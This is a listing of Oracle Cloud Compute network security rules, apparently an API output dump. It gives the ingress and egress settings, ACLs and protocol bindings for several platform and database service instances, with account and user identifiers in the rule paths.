{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ahttps'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls2db_dbport',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls2db_dbport',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/dbport'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_sys_ms2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_sys_ms2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/ora_otd2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/ora_otd2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ahttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_sys_ms2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_sys_ms2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/sys_wls2otd_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/sys_wls2otd_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ora_otd2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ora_otd2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dbexpress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dbexpress',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/dbexpress'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_trusted_hosts_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_trusted_hosts_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [
'/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_trusted_hosts_dblistener'],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/dblistener'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/sys_infra2wls_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/sys_infra2wls_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ora_otd2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/ora_otd2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/chttp'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_http',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_http',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/http'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_httpssl',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_httpssl',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/httpssl'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dbconsole',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dbconsole',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/dbconsole'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/sys_infra2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/sys_infra2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_httpssl',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_httpssl',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/httpssl'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dbconsole',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dbconsole',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/dbconsole'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_trusted_hosts_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_trusted_hosts_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [
'/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_trusted_hosts_dblistener'],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/dblistener'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ssh'], 'enabledFlag': True},
